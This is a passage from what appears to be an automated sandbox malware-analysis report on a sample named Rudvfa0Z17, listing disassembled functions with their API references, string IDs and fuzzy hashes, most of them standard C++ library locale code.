                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2525416601-3145022300
                                • Opcode ID: 6e4830b861aca5faf5c6526d7d3f3da468c763ce8c0744948eb1756581726238
                                • Instruction ID: df48b73f9e3323648c589788dc7da250848a12aad9e379499e767c09342a382d
                                • Opcode Fuzzy Hash: 6e4830b861aca5faf5c6526d7d3f3da468c763ce8c0744948eb1756581726238
                                • Instruction Fuzzy Hash: 9201C0319006099BCB05EBB0C842AFE7737AF41720F14451DF9507B2E1DF78AA058798
                                Function 0066CB15 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0066CB1C
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0066CB26
                                • int.LIBCPMT ref: 0066CB3D
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • moneypunct.LIBCPMT ref: 0066CB60
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066CB74
                                • __CxxThrowException@8.LIBCMT ref: 0066CB82
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066CB98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2090539961-3145022300
                                • Opcode ID: e5a919d2afa912a18971160e71f6e2328ff81e991e1b3ec4eb43d62a92f22d1b
                                • Instruction ID: c6c9f33f117352a071202b358afcf3945dbc27f36b15f341f60357e51fc84453
                                • Opcode Fuzzy Hash: e5a919d2afa912a18971160e71f6e2328ff81e991e1b3ec4eb43d62a92f22d1b
                                • Instruction Fuzzy Hash: 7E01AD319006099BCB05EBB0DC43AFE7727AF40720F14061DF9107B2D1DF78AA059798
                                Function 0066C3AB Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0066C3B2
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0066C3BC
                                • int.LIBCPMT ref: 0066C3D3
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • codecvt.LIBCPMT ref: 0066C3F6
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066C40A
                                • __CxxThrowException@8.LIBCMT ref: 0066C418
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066C42E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 1676052248-3145022300
                                • Opcode ID: 105b1fc00cd14f3dafaac35b09e175c8871968e761607b04bc0c4535f79579e3
                                • Instruction ID: f248424363bbbad3d580fe2275bde8c291d67a9c41a002bbccda29ca57eed011
                                • Opcode Fuzzy Hash: 105b1fc00cd14f3dafaac35b09e175c8871968e761607b04bc0c4535f79579e3
                                • Instruction Fuzzy Hash: 1501AD319006099BCB05EBA0D852AFE7727AF80720F54051DF9107B2D1DF78AE458798
                                Function 0066CBB2 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0066CBB9
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0066CBC3
                                • int.LIBCPMT ref: 0066CBDA
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066CC11
                                • __CxxThrowException@8.LIBCMT ref: 0066CC1F
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066CC35
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast$|s
                                • API String ID: 2227438316-4059296569
                                • Opcode ID: 221dacccefe2c8353e94a940c9da4ee2e1c4a9156d46a232f285566f21abb79a
                                • Instruction ID: 14e2d3f078a66b8d3e7272253945f6321af0704f225a677b50b7db09b780ca0d
                                • Opcode Fuzzy Hash: 221dacccefe2c8353e94a940c9da4ee2e1c4a9156d46a232f285566f21abb79a
                                • Instruction Fuzzy Hash: 0501AD71900A099BCB05EBB0D952AFEB737AF40720F14062DF9507B2D1DF78AA058799
                                Function 0066C448 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0066C44F
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0066C459
                                • int.LIBCPMT ref: 0066C470
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • codecvt.LIBCPMT ref: 0066C493
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066C4A7
                                • __CxxThrowException@8.LIBCMT ref: 0066C4B5
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066C4CB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 1676052248-3145022300
                                • Opcode ID: 496c9456a5503aa3fbbc2231c8bbd294be282c3d36b850c8da4dc65057579891
                                • Instruction ID: 62bf7cbec1d8700f4790014da14d411349c71620fe695fb879b4f3ed14d66504
                                • Opcode Fuzzy Hash: 496c9456a5503aa3fbbc2231c8bbd294be282c3d36b850c8da4dc65057579891
                                • Instruction Fuzzy Hash: A301A931900619ABCB05EBB0C852AFEB737AF80721F24021DF9117B2D1CF78AA458799
                                Function 0065C589 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0065C590
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0065C59A
                                • int.LIBCPMT ref: 0065C5B1
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • codecvt.LIBCPMT ref: 0065C5D4
                                • std::bad_exception::bad_exception.LIBCMT ref: 0065C5E8
                                • __CxxThrowException@8.LIBCMT ref: 0065C5F6
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0065C60C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 1676052248-3145022300
                                • Opcode ID: ef30e28e30d201cec39b9e39b2dab8913436582eab1bc4aafb0e4f233322a454
                                • Instruction ID: 22c646ed180755f14a8ffdae357330f9e018e9015fb238a3cda8fe3d1f199111
                                • Opcode Fuzzy Hash: ef30e28e30d201cec39b9e39b2dab8913436582eab1bc4aafb0e4f233322a454
                                • Instruction Fuzzy Hash: 4D01AD719002099BCB05EBB0C862AFDB727AF40732F140A1DF9117B2D1DF78AA099798
                                Function 00660E68 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00660E6F
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00660E79
                                • int.LIBCPMT ref: 00660E90
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • std::bad_exception::bad_exception.LIBCMT ref: 00660EC7
                                • __CxxThrowException@8.LIBCMT ref: 00660ED5
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660EEB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: 0s$bad cast
                                • API String ID: 2227438316-2111171359
                                • Opcode ID: da0e96c1aae7ae1894c33ca0b88a39ea7249c3ab852e1fea17965fbcda95caa2
                                • Instruction ID: 28e22f2a0183f76736cf6e528b63cac98962e73447568b09396a0688d0375d03
                                • Opcode Fuzzy Hash: da0e96c1aae7ae1894c33ca0b88a39ea7249c3ab852e1fea17965fbcda95caa2
                                • Instruction Fuzzy Hash: 9201AD319402199BCB05EBA0D843AFE7737AF80721F24092DF9117B2D1CF78AA458798
                                Function 00661E54 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 00661E5B
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00661E65
                                • int.LIBCPMT ref: 00661E7C
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • moneypunct.LIBCPMT ref: 00661E9F
                                • std::bad_exception::bad_exception.LIBCMT ref: 00661EB3
                                • __CxxThrowException@8.LIBCMT ref: 00661EC1
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00661ED7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2090539961-3145022300
                                • Opcode ID: 2f02889e413c2b2deabebbd3874861329ec63e5550089fb6aaba03a41fd2fe15
                                • Instruction ID: ab1392dd9c3f9c6ac4bdd20d3824bce6b75a70f558f7115244bf5fab511da65d
                                • Opcode Fuzzy Hash: 2f02889e413c2b2deabebbd3874861329ec63e5550089fb6aaba03a41fd2fe15
                                • Instruction Fuzzy Hash: B501AD329002099BCB05EBA0D842AFE7727BF81721F28051DF9107B2D1CF78AA459799
                                Function 0065C626 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0065C62D
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0065C637
                                • int.LIBCPMT ref: 0065C64E
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • messages.LIBCPMT ref: 0065C671
                                • std::bad_exception::bad_exception.LIBCMT ref: 0065C685
                                • __CxxThrowException@8.LIBCMT ref: 0065C693
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0065C6A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2525416601-3145022300
                                • Opcode ID: eb31311eb745ebb376378e41066841b6a901fffc0a9e2a7a10059b58935db701
                                • Instruction ID: 295ccab28ba37662100bac5b56690fc281d6c3dfbe31b658235d6fcc7de3165b
                                • Opcode Fuzzy Hash: eb31311eb745ebb376378e41066841b6a901fffc0a9e2a7a10059b58935db701
                                • Instruction Fuzzy Hash: 2A01A1319002159BCB05EBA0C842AFDB727AF40731F14011DF9117B2D1DF78AA49879A
                                Function 0066D737 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0066D73E
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0066D748
                                • int.LIBCPMT ref: 0066D75F
                                  • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                • collate.LIBCPMT ref: 0066D782
                                • std::bad_exception::bad_exception.LIBCMT ref: 0066D796
                                • __CxxThrowException@8.LIBCMT ref: 0066D7A4
                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066D7BA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcollatestd::bad_exception::bad_exceptionstd::locale::facet::_
                                • String ID: bad cast
                                • API String ID: 2346505839-3145022300
                                • Opcode ID: bbff907262fb0a16318392415fcbb353a6b372bd2b19361aba4da2d6a9570208
                                • Instruction ID: 4a557789ea30e55437683725dc081b23eb82ccf9e3f46204383c1890a41eda25
                                • Opcode Fuzzy Hash: bbff907262fb0a16318392415fcbb353a6b372bd2b19361aba4da2d6a9570208
                                • Instruction Fuzzy Hash: DF019271A002199BDB05EBB0D843AFE7B37AF80721F24052DF9117B2D1DF78AA458799
                                Function 0040E790 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _wprintf
                                • String ID: [DATA_IN]%s$[DATA_OUT]%s$[HEADER_IN]%s$[HEADER_OUT]%s
                                • API String ID: 2738768116-1258772499
                                • Opcode ID: 625cc3fe3b23ffa21748f98c8a39db130a157506833062a54fe6aaef8372a764
                                • Instruction ID: 36728138fc2062ef771174b41612b96174258983edbb5e794f746bbfc9dd3fb0
                                • Opcode Fuzzy Hash: 625cc3fe3b23ffa21748f98c8a39db130a157506833062a54fe6aaef8372a764
                                • Instruction Fuzzy Hash: 98F09072A502486BAB50EAE5AC4283B339AD695714F148C29FA08C7381F026E93092A7
                                Function 026DAAB4 Relevance: 13.6, APIs: 9, Instructions: 117memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,100200B0), ref: 026DAAFB
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 026DAB11
                                • GetLastError.KERNEL32 ref: 026DAB20
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 026DABAF
                                • _free.LIBCMT ref: 026DABC2
                                • GetLastError.KERNEL32 ref: 026DABCA
                                • SysAllocString.OLEAUT32(00000000), ref: 026DABE5
                                • _free.LIBCMT ref: 026DABF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide_free$AllocStringlstrlen
                                • String ID:
                                • API String ID: 2233872252-0
                                • Opcode ID: 0e2864b2f80fe783548e683be4136040275d80d7fb7db7506154fba73c2146e3
                                • Instruction ID: 8c592d3b62aa002c6557bda980a3682b42a6fc9ba33b7f3a2ea72c9b8323ecae
                                • Opcode Fuzzy Hash: 0e2864b2f80fe783548e683be4136040275d80d7fb7db7506154fba73c2146e3
                                • Instruction Fuzzy Hash: 4541C3B1D0431DABDB10EFA48D44BAE7AAAEB48764F10452DF805E7280D7789E05CBA5
                                Function 1000AAB0 Relevance: 13.6, APIs: 9, Instructions: 117memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(10002554,100200B0,?,00000000,00000000,?,100016A6,?,00000004,10002554,?), ref: 1000AAF7
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,100016A6,?,00000004,10002554,?), ref: 1000AB0D
                                • GetLastError.KERNEL32(?,100016A6,?,00000004,10002554,?), ref: 1000AB1C
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,?,100016A6,?,00000004,10002554), ref: 1000ABAB
                                • _free.LIBCMT ref: 1000ABBE
                                • GetLastError.KERNEL32(?,?,100016A6,?,00000004,10002554), ref: 1000ABC6
                                • SysAllocString.OLEAUT32(00000000), ref: 1000ABE1
                                • _free.LIBCMT ref: 1000ABF2
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide_free$AllocStringlstrlen
                                • String ID:
                                • API String ID: 2233872252-0
                                • Opcode ID: c525a2dc86abb622627aec347f05c5c100962417d582995e3ed933296b725680
                                • Instruction ID: 7a9aabcc70d3fdf9ab92ec66efeb58e3645fa49096dc95b045ab2c4300f8d26f
                                • Opcode Fuzzy Hash: c525a2dc86abb622627aec347f05c5c100962417d582995e3ed933296b725680
                                • Instruction Fuzzy Hash: 1541F372D00319ABF710DF648C45F9F7BA9EB497E0F118229F805E7286D774AA8087A1
                                Function 00418330 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 278fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004289F0: __strftime_l.LIBCMT ref: 00428A1C
                                  • Part of subcall function 004289F0: OutputDebugStringW.KERNEL32(?), ref: 00428A2B
                                  • Part of subcall function 00428B10: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00428B4E
                                  • Part of subcall function 00428B10: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00428B6D
                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004185A1
                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?), ref: 004185AC
                                • __beginthread.LIBCMT ref: 004185BA
                                • GetParent.USER32(?), ref: 004185CF
                                • ShowWindow.USER32(?,00000000,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 004185E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Create$CloseDebugFileFirstHandleOutputParentProcess32ShowSnapshotStringToolhelp32Window__beginthread__strftime_l
                                • String ID: RunGameAndHide:$[RunGameAndHide]
                                • API String ID: 2820978717-1348079272
                                • Opcode ID: 8de73a8d6d35abf6caafc5abf604a63440bf3942a8bffda7b7bb9bba62447ef1
                                • Instruction ID: 19b64a5859a50338e08721d04a472bebaefcc932caef4b95ad2707306ffe068f
